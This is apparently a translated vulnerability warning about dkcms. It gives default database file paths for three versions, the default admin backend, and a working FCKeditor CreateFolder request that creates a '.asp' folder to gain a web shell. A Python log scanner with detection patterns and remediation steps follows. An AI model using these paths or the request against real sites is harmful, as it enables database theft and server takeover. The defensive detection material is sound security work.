The movable section (dkcms) vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201336692
Type myhack58
Reporter Anonymous
Modified 2013-01-13T00:00:00


There are roughly three main versions: v2.0, v3.1 and v4.2.

Google keyword: powered by dkcms

After looking for a source code download for the website and searching Baidu, I downloaded the source code for these 3 versions. As it is ASP source code, the main thing to look at is the default database. The three default databases are:

V2.0: data/dkcm_ssdfhwejkfs.mdb

V3.1: _data/___dkcms_3 0_free.mdb

V4.2: _data/I^(()UU()H.mdb

The default backend is: admin


As these show, the vendor's security awareness is quite poor. As for getting a shell from the backend, the FCKeditor bypass can be used to get the shell.

Creating the asp folder

FCKeditor path:

Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp
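
For site owners running dkcms, the two behaviours described above (a database file fetched directly over HTTP, and a CreateFolder call to the FCKeditor connector with a folder name ending in a script extension) can be looked for in web server logs. The following is an added example, not code from the original post or from dkcms; the simplified log field order, the sample lines and the extensions other than .asp are assumptions of the example.

```python
from urllib.parse import parse_qs, unquote

# Constructed sample lines. Assumed field order (simplified W3C/IIS style):
# date time method uri-stem uri-query status client-ip
SAMPLE_LOG = """\
2013-01-10 08:01:12 GET /index.asp id=3 200 192.0.2.10
2013-01-10 08:02:40 GET /_data/site.mdb - 200 192.0.2.44
2013-01-10 08:03:05 GET /admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=/x.asp&NewFolderName=x.asp 200 192.0.2.44
2013-01-10 08:04:00 GET /admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp Command=GetFolders&Type=Image&CurrentFolder=/ 200 192.0.2.7
"""

# The page only mentions .asp; the other script-mapped extensions are an assumption.
SCRIPT_EXTS = (".asp", ".asa", ".cer")


def classify(line):
    """Return (finding, client_ip, status) for one log line, or None."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, _method, stem, query, status, ip = parts[:7]
    stem_l = unquote(stem).lower()

    # An Access database requested over HTTP; status 200 means it was served.
    if stem_l.endswith(".mdb"):
        return ("mdb-download", ip, status)

    # FCKeditor ASP connector asked to create a folder named like a script.
    if "/fckeditor/" in stem_l and stem_l.endswith("/connector.asp"):
        q = {k.lower(): v[0] for k, v in parse_qs(query).items()}
        if q.get("command", "").lower() == "createfolder":
            names = (q.get("newfoldername", ""), q.get("currentfolder", ""))
            if any(n.rstrip("/").lower().endswith(SCRIPT_EXTS) for n in names):
                return ("fck-script-folder", ip, status)
    return None


def scan(log_text):
    """Classify every line of a log and return only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A hit of either kind with status 200 is a reason to move the database out of the web root, rename the backend directory, and remove or restrict the FCKeditor connector.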